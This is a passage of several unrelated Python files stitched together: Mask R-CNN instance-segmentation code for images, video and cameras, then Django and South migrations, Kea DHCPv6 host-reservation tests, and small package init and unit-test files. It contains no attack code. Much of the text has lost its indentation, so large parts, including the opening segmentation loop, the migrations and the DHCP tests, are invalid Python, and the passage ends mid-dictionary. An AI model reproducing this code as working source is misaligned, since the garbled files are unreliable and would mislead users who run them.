# Run detection
results = self.model.detect([frame])
# print("No. of frames:", counter)
r = results[0]
#apply segmentation mask
output = display_instances(frame, r['rois'], r['masks'], r['class_ids'], coco_config.class_names, custom)
output = cv2.resize(output, (width,height), interpolation=cv2.INTER_AREA)
if output_video_name is not None:
save_video.write(output)
else:
break
end = time.time()
print(f"Processed {length} frames in {end-start:.1f} seconds")
capture.release()
if frames_per_second is not None:
save_video.release()
return r, output
else:
while True:
counter +=1
ret, frame = capture.read()
if ret:
# Run detection
results = self.model.detect([frame])
# print("No. of frames:", counter)
r = results[0]
#apply segmentation mask with bounding boxes
output = display_box_instances(frame, r['rois'], r['masks'], r['class_ids'], coco_config.class_names, r['scores'], custom)
output = cv2.resize(output, (width,height), interpolation=cv2.INTER_AREA)
if output_video_name is not None:
save_video.write(output)
else:
break
capture.release()
end = time.time()
print(f"Processed {counter} frames in {end-start:.1f} seconds")
if frames_per_second is not None:
save_video.release()
return r, output
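The frame-counting pattern used throughout these loops (count processed frames, then divide by elapsed wall-clock time) can be isolated into a small helper; `measure_fps` below is an illustrative assumption, not part of this module:

```python
import time

def measure_fps(process_frame, frames):
    """Run process_frame over an iterable of frames; return (count, fps)."""
    counter = 0
    start = time.time()
    for frame in frames:
        process_frame(frame)
        counter += 1
    elapsed = time.time() - start
    # Guard against division by zero on very fast runs.
    fps = counter / elapsed if elapsed > 0 else float("inf")
    return counter, fps
```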
def process_camera(self, cam, show_bboxes = False, output_video_name = None, frames_per_second = None, show_frames = None, frame_name = None, verbose = None, check_fps = False, custom=None):
capture = cam
width = int(capture.get(cv2.CAP_PROP_FRAME_WIDTH))
height = int(capture.get(cv2.CAP_PROP_FRAME_HEIGHT))
codec = cv2.VideoWriter_fourcc(*'DIVX')
if frames_per_second is not None:
save_video = cv2.VideoWriter(output_video_name, codec, frames_per_second, (width, height))
counter = 0
start = time.time()
coco_config.class_names = ['BG', 'person', 'bicycle', 'car', 'motorcycle', 'airplane',
'bus', 'train', 'truck', 'boat', 'traffic light',
'fire hydrant', 'stop sign', 'parking meter', 'bench', 'bird',
'cat', 'dog', 'horse', 'sheep', 'cow', 'elephant', 'bear',
'zebra', 'giraffe', 'backpack', 'umbrella', 'handbag', 'tie',
'suitcase', 'frisbee', 'skis', 'snowboard', 'sports ball',
'kite', 'baseball bat', 'baseball glove', 'skateboard',
'surfboard', 'tennis racket', 'bottle', 'wine glass', 'cup',
'fork', 'knife', 'spoon', 'bowl', 'banana', 'apple',
'sandwich', 'orange', 'broccoli', 'carrot', 'hot dog', 'pizza',
'donut', 'cake', 'chair', 'couch', 'potted plant', 'bed',
'dining table', 'toilet', 'tv', 'laptop', 'mouse', 'remote',
'keyboard', 'cell phone', 'microwave', 'oven', 'toaster',
'sink', 'refrigerator', 'book', 'clock', 'vase', 'scissors',
'teddy bear', 'hair drier', 'toothbrush']
if show_bboxes == False:
while True:
counter +=1
ret, frame = capture.read()
if ret:
# Run detection
results = self.model.detect([frame])
# if verbose is not None:
# print("No. of frames:", counter)
r = results[0]
#apply segmentation mask
output = display_instances(frame, r['rois'], r['masks'], r['class_ids'], coco_config.class_names, custom)
output = cv2.resize(output, (width,height), interpolation=cv2.INTER_AREA)
if show_frames == True:
if frame_name is not None:
cv2.imshow(frame_name, output)
if cv2.waitKey(25) & 0xFF == ord('q'):
break
if output_video_name is not None:
save_video.write(output)
else:
break
end = time.time()
if verbose is not None:
print(f"Processed {counter} frames in {end-start:.1f} seconds")
if check_fps == True:
out = capture.get(cv2.CAP_PROP_FPS)
print(f"{out} frames per second")
capture.release()
if frames_per_second is not None:
save_video.release()
return r, output
else:
while True:
counter +=1
ret, frame = capture.read()
if ret:
# Run detection
results = self.model.detect([frame])
# if verbose is not None:
# print("No. of frames:", counter)
r = results[0]
#apply segmentation mask with bounding boxes
output = display_box_instances(frame, r['rois'], r['masks'], r['class_ids'], coco_config.class_names, r['scores'], custom)
output = cv2.resize(output, (width,height), interpolation=cv2.INTER_AREA)
if show_frames == True:
if frame_name is not None:
cv2.imshow(frame_name, output)
if cv2.waitKey(25) & 0xFF == ord('q'):
break
if output_video_name is not None:
save_video.write(output)
else:
break
end = time.time()
if verbose is not None:
print(f"Processed {counter} frames in {end-start:.1f} seconds")
if check_fps == True:
out = capture.get(cv2.CAP_PROP_FPS)
print(f"{out} frames per second")
capture.release()
if frames_per_second is not None:
save_video.release()
return r, output
#############################################################
#############################################################
""" CLASS FOR PERFORMING INFERENCE WITH A CUSTOM MODEL """
#############################################################
#############################################################
class custom_segmentation:
def __init__(self):
self.model_dir = os.getcwd()
def inferConfig(self,name = None, network_backbone = "resnet101", num_classes = 1, class_names = ["BG"], batch_size = 1, image_max_dim = 512, image_min_dim = 512, image_resize_mode ="square", gpu_count = 1):
self.config = Config(BACKBONE = network_backbone, NUM_CLASSES = 1 + num_classes, class_names = class_names,
IMAGES_PER_GPU = batch_size, IMAGE_MAX_DIM = image_max_dim, IMAGE_MIN_DIM = image_min_dim, IMAGE_RESIZE_MODE = image_resize_mode,
GPU_COUNT = gpu_count)
def load_model(self, model_path):
# load the trained weights for the custom model
self.model = MaskRCNN(mode="inference", model_dir = self.model_dir, config=self.config)
self.model.load_weights(model_path, by_name=True)
def segmentImage(self, image_path, show_bboxes = False, output_image_name = None, verbose = None):
image = cv2.imread(image_path)
new_img = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)
# Run detection
if verbose is not None:
print("Processing image...")
results = self.model.detect([new_img])
r = results[0]
if show_bboxes == False:
#apply segmentation mask
output = display_instances(image, r['rois'], r['masks'], r['class_ids'],self.config.class_names)
if output_image_name is not None:
cv2.imwrite(output_image_name, output)
print("Processed image saved successfully in your current working directory.")
return r, output
else:
#apply segmentation mask with bounding boxes
output = display_box_instances(image, r['rois'], r['masks'], r['class_ids'], self.config.class_names, r['scores'])
if output_image_name is not None:
cv2.imwrite(output_image_name, output)
print("Processed image saved successfully in your current working directory.")
return r, output
def segmentFrame(self, frame, show_bboxes = False, output_image_name = None, verbose= None):
new_img = cv2.cvtColor(frame, cv2.COLOR_RGB2BGR)
if verbose is not None:
print("Processing frame...")
# Run detection
results = self.model.detect([new_img])
r = results[0]
if show_bboxes == False:
#apply segmentation mask
output = display_instances(frame, r['rois'], r['masks'], r['class_ids'], self.config.class_names)
if output_image_name is not None:
cv2.imwrite(output_image_name, output)
print("Processed image saved successfully in your current working directory.")
return r, output
else:
#apply segmentation mask with bounding boxes
output = display_box_instances(frame, r['rois'], r['masks'], r['class_ids'], self.config.class_names, r['scores'])
if output_image_name is not None:
cv2.imwrite(output_image_name, output)
print("Processed image saved successfully in your current working directory.")
return r, output
    def process_video(self, video_path, show_bboxes=False, output_video_name=None, frames_per_second=None):
        capture = cv2.VideoCapture(video_path)
        width = int(capture.get(cv2.CAP_PROP_FRAME_WIDTH))
        height = int(capture.get(cv2.CAP_PROP_FRAME_HEIGHT))
        codec = cv2.VideoWriter_fourcc(*'DIVX')
        # The writer only exists when an fps was given; guard every use of it
        # below to avoid a NameError when output_video_name is set without one.
        save_video = None
        if frames_per_second is not None:
            save_video = cv2.VideoWriter(output_video_name, codec, frames_per_second, (width, height))
        counter = 0
        start = time.time()
        while True:
            ret, frame = capture.read()
            if not ret:
                break
            # Count only successfully read frames.
            counter += 1
            # Run detection
            results = self.model.detect([frame], verbose=0)
            print("No. of frames:", counter)
            r = results[0]
            if not show_bboxes:
                # apply segmentation mask
                output = display_instances(frame, r['rois'], r['masks'], r['class_ids'], self.config.class_names)
            else:
                # apply segmentation mask with bounding boxes
                output = display_box_instances(frame, r['rois'], r['masks'], r['class_ids'], self.config.class_names, r['scores'])
            output = cv2.resize(output, (width, height), interpolation=cv2.INTER_AREA)
            if output_video_name is not None and save_video is not None:
                save_video.write(output)
        end = time.time()
        print(f"Processed {counter} frames in {end-start:.1f} seconds")
        capture.release()
        if save_video is not None:
            save_video.release()
        return r, output
    def process_camera(self, cam, show_bboxes=False, output_video_name=None, frames_per_second=None, show_frames=None, frame_name=None, verbose=None, check_fps=False):
        capture = cam
        width = int(capture.get(cv2.CAP_PROP_FRAME_WIDTH))
        height = int(capture.get(cv2.CAP_PROP_FRAME_HEIGHT))
        codec = cv2.VideoWriter_fourcc(*'DIVX')
        # As in process_video, the writer only exists when an fps was given.
        save_video = None
        if frames_per_second is not None:
            save_video = cv2.VideoWriter(output_video_name, codec, frames_per_second, (width, height))
        counter = 0
        start = time.time()
        while True:
            ret, frame = capture.read()
            if not ret:
                break
            # Count only successfully read frames.
            counter += 1
            # Run detection
            results = self.model.detect([frame])
            if verbose is not None:
                print("No. of frames:", counter)
            r = results[0]
            if not show_bboxes:
                # apply segmentation mask
                output = display_instances(frame, r['rois'], r['masks'], r['class_ids'], self.config.class_names)
            else:
                # apply segmentation mask with bounding boxes
                output = display_box_instances(frame, r['rois'], r['masks'], r['class_ids'], self.config.class_names, r['scores'])
            output = cv2.resize(output, (width, height), interpolation=cv2.INTER_AREA)
            if show_frames and frame_name is not None:
                cv2.imshow(frame_name, output)
                if cv2.waitKey(25) & 0xFF == ord('q'):
                    break
            if output_video_name is not None and save_video is not None:
                save_video.write(output)
        end = time.time()
        if verbose is not None:
            print(f"Processed {counter} frames in {end-start:.1f} seconds")
        if check_fps:
            fps = capture.get(cv2.CAP_PROP_FPS)
            print(f"{fps} frames per second")
        capture.release()
        if save_video is not None:
            save_video.release()
        return r, output
################ VISUALIZATION CODE ##################
def random_colors(N, bright=True):
    """
    Generate random colors.
    To get visually distinct colors, generate them in HSV space then
    convert to RGB.
    """
    brightness = 1.0 if bright else 0.7
    hsv = [(i / N, 1, brightness) for i in range(N)]
    colors = list(map(lambda c: colorsys.hsv_to_rgb(*c), hsv))
    random.shuffle(colors)
    return colors
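A standalone sketch (not part of the original file) of the HSV spacing `random_colors` relies on, using a hypothetical `N` of 3 at full brightness; hues spread evenly around the colour wheel map to maximally distinct RGB triples:

```python
import colorsys

# Demo values only: three hues spaced 1/3 of the wheel apart.
N, brightness = 3, 1.0
hsv = [(i / N, 1, brightness) for i in range(N)]
colors = [colorsys.hsv_to_rgb(*c) for c in hsv]
# Rounded to suppress floating-point noise from the hue conversion.
print([tuple(round(x, 6) for x in c) for c in colors])  # pure red, green, blue
```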
def apply_mask(image, mask, color, alpha=0.5):
    """Apply the given mask to the image."""
    for c in range(3):
        image[:, :, c] = np.where(mask == 1,
                                  image[:, :, c] * (1 - alpha) + alpha * color[c] * 255,
                                  image[:, :, c])
    return image
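A minimal sketch of the blend `apply_mask` performs, on made-up 2x2 data: masked pixels are pulled toward the colour by `alpha`, unmasked pixels are left untouched.

```python
import numpy as np

# Hypothetical demo data: a flat grey "image" and a diagonal mask.
image = np.full((2, 2, 3), 100.0)
mask = np.array([[1, 0], [0, 1]])
color, alpha = (1.0, 0.0, 0.0), 0.5
for c in range(3):
    image[:, :, c] = np.where(mask == 1,
                              image[:, :, c] * (1 - alpha) + alpha * color[c] * 255,
                              image[:, :, c])
print(image[0, 0])  # masked pixel: red channel at 177.5, others at 50.0
```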
def display_instances(image, boxes, masks, class_ids, class_name, custom=None):
    n_instances = boxes.shape[0]
    colors = random_colors(n_instances)
    if not n_instances:
        print('NO INSTANCES TO DISPLAY')
    else:
        assert boxes.shape[0] == masks.shape[-1] == class_ids.shape[0]
    for i, color in enumerate(colors):
        if custom is not None:
            check_name = class_name[class_ids[i]]
            check = custom.get(check_name, 'invalid')
            if check == "invalid":
                continue
        mask = masks[:, :, i]
        image = apply_mask(image, mask, color)
    return image
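The `custom.get(name, 'invalid')` check above is a class whitelist: any detected class missing from the dict is skipped. Isolated below with hypothetical demo values:

```python
# Demo whitelist and detection list; neither comes from the original file.
custom = {'person': 1, 'car': 1}
detected = ['person', 'dog', 'car']
kept = [name for name in detected if custom.get(name, 'invalid') != 'invalid']
print(kept)  # ['person', 'car']
```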
def display_box_instances(image, boxes, masks, class_ids, class_name, scores, custom=None):
    n_instances = boxes.shape[0]
    colors = random_colors(n_instances)
    assert boxes.shape[0] == masks.shape[-1] == class_ids.shape[0]
    for i, color in enumerate(colors):
        if not np.any(boxes[i]):
            continue
        y1, x1, y2, x2 = boxes[i]
        label = class_name[class_ids[i]]
        if custom is not None:
            check = custom.get(label, 'invalid')
            if check == "invalid":
                continue
        score = scores[i] if scores is not None else None
        caption = '{} {:.2f}'.format(label, score) if score else label
        mask = masks[:, :, i]
        image = apply_mask(image, mask, color)
        color_rec = [int(c) for c in np.array(color) * 255]
        image = cv2.rectangle(image, (x1, y1), (x2, y2), color_rec, 2)
        image = cv2.putText(
            image, caption, (x1, y1), cv2.FONT_HERSHEY_COMPLEX, 0.5, color=(255, 255, 255))
    return image
# yfantasy_api/models/__init__.py (frugardc/yfantasy-api, MIT)
from yfantasy_api.models.game import Game
from yfantasy_api.models.league import League
from yfantasy_api.models.common import Team
from yfantasy_api.models.user import User
# app/core/migrations/0003_auto_20200101_2311.py (Raysultan/roscosmos-stats, MIT)
# Generated by Django 3.0.1 on 2020-01-01 23:11
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('core', '0002_launchpad_establishment_date'),
]
operations = [
migrations.AlterField(
model_name='launch',
name='description',
field=models.TextField(blank=True, null=True),
),
migrations.AlterField(
model_name='launchpad',
name='description',
field=models.TextField(blank=True, null=True),
),
migrations.AlterField(
model_name='launchpad',
name='no_employees',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='launchpad',
name='use_period',
field=models.CharField(blank=True, max_length=255, null=True),
),
migrations.AlterField(
model_name='launchpad',
name='used_by',
field=models.CharField(blank=True, max_length=255, null=True),
),
migrations.AlterField(
model_name='launchvehicle',
name='description',
field=models.TextField(blank=True, null=True),
),
migrations.AlterField(
model_name='launchvehicle',
name='max_distance',
field=models.CharField(blank=True, max_length=64, null=True),
),
migrations.AlterField(
model_name='orbitalgrouping',
name='accuracy',
field=models.CharField(blank=True, max_length=64, null=True),
),
migrations.AlterField(
model_name='orbitalgrouping',
name='coverage',
field=models.CharField(blank=True, max_length=64, null=True),
),
migrations.AlterField(
model_name='orbitalgrouping',
name='description',
field=models.TextField(blank=True, null=True),
),
migrations.AlterField(
model_name='orbitalgrouping',
name='first_launch_date',
field=models.DateField(blank=True, null=True),
),
migrations.AlterField(
model_name='orbitalgrouping',
name='no_planes',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='orbitalgrouping',
name='no_spacecrafts',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='orbitalgrouping',
name='no_spacecrafts_on_plane',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='orbitalgrouping',
name='orbit_height',
field=models.CharField(blank=True, max_length=64, null=True),
),
migrations.AlterField(
model_name='orbitalgrouping',
name='orbital_inclination',
field=models.CharField(blank=True, max_length=64, null=True),
),
migrations.AlterField(
model_name='orbitalgrouping',
name='orbital_period',
field=models.CharField(blank=True, max_length=64, null=True),
),
migrations.AlterField(
model_name='spacecraft',
name='accuracy',
field=models.CharField(blank=True, max_length=64, null=True),
),
migrations.AlterField(
model_name='spacecraft',
name='coverage_diameter',
field=models.CharField(blank=True, max_length=64, null=True),
),
migrations.AlterField(
model_name='spacecraft',
name='description',
field=models.TextField(blank=True, null=True),
),
migrations.AlterField(
model_name='spacecraft',
name='manufacturer',
field=models.CharField(blank=True, max_length=255, null=True),
),
migrations.AlterField(
model_name='spacecraft',
name='orbital_inclination',
field=models.CharField(blank=True, max_length=64, null=True),
),
migrations.AlterField(
model_name='spacecraft',
name='orbital_period',
field=models.CharField(blank=True, max_length=64, null=True),
),
migrations.AlterField(
model_name='spacetug',
name='autonomous_flight_time',
field=models.CharField(blank=True, max_length=64, null=True),
),
migrations.AlterField(
model_name='spacetug',
name='description',
field=models.TextField(blank=True, null=True),
),
migrations.AlterField(
model_name='spacetug',
name='first_launch_date',
field=models.DateField(blank=True, null=True),
),
migrations.AlterField(
model_name='spacetug',
name='no_flights',
field=models.IntegerField(blank=True, null=True),
),
]
# tests/dhcpv6/kea_only/host_reservation/test_host_reservation_pgsql.py (shawnmullaney/forge, 0BSD)
"""Host Reservation DHCPv6 stored in PostgreSQL database."""
# pylint: disable=invalid-name,line-too-long
import pytest
import srv_msg
import misc
import srv_control
@pytest.mark.v6
@pytest.mark.host_reservation
@pytest.mark.kea_only
@pytest.mark.pgsql
def test_v6_host_reservation_pgsql_all_values_mac():
misc.test_setup()
srv_control.config_srv_subnet('3000::/64', '3000::1-3000::ff')
srv_control.enable_db_backend_reservation('PostgreSQL')
srv_control.new_db_backend_reservation('PostgreSQL', 'hw-address', 'f6:f5:f4:f3:f2:01')
srv_control.update_db_backend_reservation('hostname', 'reserved-hostname', 'PostgreSQL', '1')
srv_control.update_db_backend_reservation('dhcp6_subnet_id', '1', 'PostgreSQL', '1')
srv_control.ipv6_prefix_db_backend_reservation('3001::', '40', '$(EMPTY)', 'PostgreSQL', '1')
srv_control.ipv6_address_db_backend_reservation('3000::100', '$(EMPTY)', 'PostgreSQL', '1')
srv_control.ipv6_address_db_backend_reservation('3000::101', '$(EMPTY)', 'PostgreSQL', '1')
srv_control.option_db_record_reservation('32',
'10',
'dhcp6',
'1',
'$(EMPTY)',
'1',
'subnet',
'PostgreSQL',
'1')
srv_control.upload_db_reservation('PostgreSQL')
srv_control.add_ddns_server('127.0.0.1', '53001')
srv_control.add_ddns_server_options('enable-updates', 'true')
srv_control.add_ddns_server_options('qualifying-suffix', 'my.domain.com')
srv_control.build_and_send_config_files('SSH', 'config-file')
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'ia_id', '666')
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:01')
srv_msg.client_does_include('Client', None, 'IA-PD')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_does_include('Client', None, 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
misc.test_procedure()
srv_msg.client_copy_option('server-id')
srv_msg.client_copy_option('IA_NA')
srv_msg.client_copy_option('IA_PD')
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:01')
srv_msg.client_sets_value('Client', 'FQDN_domain_name', 'some-different-name')
srv_msg.client_sets_value('Client', 'FQDN_flags', 'S')
srv_msg.client_does_include('Client', None, 'fqdn')
srv_msg.client_requests_option('32')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
srv_msg.response_check_suboption_content('Response', '5', '3', None, 'addr', '3000::100')
srv_msg.response_check_include_option('Response', None, '25')
srv_msg.response_check_option_content('Response', '25', None, 'sub-option', '26')
srv_msg.response_check_suboption_content('Response', '26', '25', None, 'prefix', '3001::')
srv_msg.response_check_include_option('Response', None, '39')
srv_msg.response_check_option_content('Response',
'39',
None,
'fqdn',
'reserved-hostname.my.domain.com.')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'ia_id', '777')
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:01')
srv_msg.client_does_include('Client', None, 'IA-PD')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_does_include('Client', None, 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
misc.test_procedure()
srv_msg.client_copy_option('server-id')
srv_msg.client_copy_option('IA_NA')
srv_msg.client_copy_option('IA_PD')
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:01')
srv_msg.client_sets_value('Client', 'FQDN_domain_name', 'some-different-name')
srv_msg.client_sets_value('Client', 'FQDN_flags', 'S')
srv_msg.client_does_include('Client', None, 'fqdn')
srv_msg.client_requests_option('32')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
srv_msg.response_check_suboption_content('Response', '5', '3', 'NOT ', 'addr', '3000::100')
@pytest.mark.v6
@pytest.mark.host_reservation
@pytest.mark.kea_only
@pytest.mark.pgsql
def test_v6_host_reservation_pgsql_duid_ll_matching():
misc.test_setup()
srv_control.config_srv_subnet('3000::/64', '3000::1-3000::ff')
srv_control.enable_db_backend_reservation('PostgreSQL')
srv_control.new_db_backend_reservation('PostgreSQL', 'duid', '00:03:00:01:f6:f5:f4:f3:f2:01')
srv_control.update_db_backend_reservation('dhcp6_subnet_id', '1', 'PostgreSQL', '1')
srv_control.ipv6_address_db_backend_reservation('3000::100', '$(EMPTY)', 'PostgreSQL', '1')
srv_control.upload_db_reservation('PostgreSQL')
srv_control.build_and_send_config_files('SSH', 'config-file')
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:01')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_does_include('Client', None, 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
srv_msg.response_check_suboption_content('Response', '5', '3', None, 'addr', '3000::100')
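The DUID-LL values used throughout these tests are the reserved MAC address with a fixed prefix: DUID type 3, hardware type 1 (per RFC 8415). The sketch below rebuilds the DUID from the MAC reserved above:

```python
# MAC from the reservation above; '00:03' = DUID-LL, '00:01' = Ethernet.
mac = 'f6:f5:f4:f3:f2:01'
duid_ll = '00:03:00:01:' + mac
print(duid_ll)  # 00:03:00:01:f6:f5:f4:f3:f2:01
```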
@pytest.mark.v6
@pytest.mark.host_reservation
@pytest.mark.kea_only
@pytest.mark.pgsql
def test_v6_host_reservation_pgsql_hwaddrr_not_matching():
misc.test_setup()
srv_control.config_srv_subnet('3000::/64', '3000::1-3000::ff')
srv_control.enable_db_backend_reservation('PostgreSQL')
srv_control.new_db_backend_reservation('PostgreSQL', 'hw-address', 'f6:f5:f4:f3:f2:01')
srv_control.update_db_backend_reservation('dhcp6_subnet_id', '1', 'PostgreSQL', '1')
srv_control.ipv6_address_db_backend_reservation('3000::100', '$(EMPTY)', 'PostgreSQL', '1')
srv_control.upload_db_reservation('PostgreSQL')
srv_control.build_and_send_config_files('SSH', 'config-file')
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'DUID', '00:01:00:01:52:7b:a8:f0:f6:f5:f4:f3:f2:11')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_does_include('Client', None, 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
srv_msg.response_check_suboption_content('Response', '5', '3', 'NOT ', 'addr', '3000::100')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:11')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_does_include('Client', None, 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
srv_msg.response_check_suboption_content('Response', '5', '3', 'NOT ', 'addr', '3000::100')
@pytest.mark.v6
@pytest.mark.host_reservation
@pytest.mark.kea_only
@pytest.mark.pgsql
def test_v6_host_reservation_pgsql_hwaddrr_matching():
misc.test_setup()
srv_control.config_srv_subnet('3000::/64', '3000::1-3000::ff')
srv_control.enable_db_backend_reservation('PostgreSQL')
srv_control.new_db_backend_reservation('PostgreSQL', 'hw-address', 'f6:f5:f4:f3:f2:01')
srv_control.update_db_backend_reservation('dhcp6_subnet_id', '1', 'PostgreSQL', '1')
srv_control.ipv6_address_db_backend_reservation('3000::100', '$(EMPTY)', 'PostgreSQL', '1')
srv_control.upload_db_reservation('PostgreSQL')
srv_control.build_and_send_config_files('SSH', 'config-file')
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'DUID', '00:01:00:01:52:7b:a8:f0:f6:f5:f4:f3:f2:01')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_does_include('Client', None, 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
srv_msg.response_check_suboption_content('Response', '5', '3', None, 'addr', '3000::100')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:01')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_does_include('Client', None, 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
srv_msg.response_check_suboption_content('Response', '5', '3', None, 'addr', '3000::100')
@pytest.mark.v6
@pytest.mark.host_reservation
@pytest.mark.kea_only
@pytest.mark.pgsql
def test_v6_host_reservation_pgsql_hwaddrr_matching_dual_backend():
misc.test_setup()
srv_control.config_srv_subnet('3000::/64', '3000::1-3000::ff')
srv_control.enable_db_backend_reservation('PostgreSQL')
srv_control.new_db_backend_reservation('PostgreSQL', 'hw-address', 'f6:f5:f4:f3:f2:11')
srv_control.update_db_backend_reservation('dhcp6_subnet_id', '1', 'PostgreSQL', '1')
srv_control.ipv6_address_db_backend_reservation('3000::100', '$(EMPTY)', 'PostgreSQL', '1')
srv_control.upload_db_reservation('PostgreSQL')
srv_control.host_reservation_in_subnet('address',
'3000::fff',
'0',
'hw-address',
'f6:f5:f4:f3:f2:22')
srv_control.build_and_send_config_files('SSH', 'config-file')
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'DUID', '00:01:00:01:52:7b:a8:f0:f6:f5:f4:f3:f2:11')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_does_include('Client', None, 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
srv_msg.response_check_suboption_content('Response', '5', '3', None, 'addr', '3000::100')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:22')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_does_include('Client', None, 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
srv_msg.response_check_suboption_content('Response', '5', '3', None, 'addr', '3000::fff')
# py_crypto_hd_wallet/common/__init__.py (3rdIteration/py_crypto_hd_wallet, MIT)
from py_crypto_hd_wallet.common.hd_wallet_base import HdWalletBase
from py_crypto_hd_wallet.common.hd_wallet_data_types import HdWalletDataTypes
# tests/unit/lms/views/onedrive_test.py (hypothesis/lms, BSD-2-Clause)
from lms.views.onedrive import redirect_uri
def test_redirect_uri(pyramid_request):
assert not redirect_uri(pyramid_request)
# resume_app/migrations/0004_auto__del_field_resume_skill_string.py (joshcai/resumatch, MIT)
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Deleting field 'Resume.skill_string'
db.delete_column(u'resume_app_resume', 'skill_string')
def backwards(self, orm):
# Adding field 'Resume.skill_string'
db.add_column(u'resume_app_resume', 'skill_string',
self.gf('django.db.models.fields.TextField')(default=''),
keep_default=False)
models = {
u'resume_app.additional': {
'Meta': {'object_name': 'Additional'},
'descriptions': ('django.db.models.fields.TextField', [], {'default': "''"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '120'}),
'user_id': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['resume_app.User']"})
},
u'resume_app.additional_section': {
'Meta': {'object_name': 'Additional_Section'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '120'}),
'sections': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['resume_app.Additional']", 'symmetrical': 'False'}),
'user_id': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['resume_app.User']"})
},
u'resume_app.comment': {
'Meta': {'object_name': 'Comment'},
'comment': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
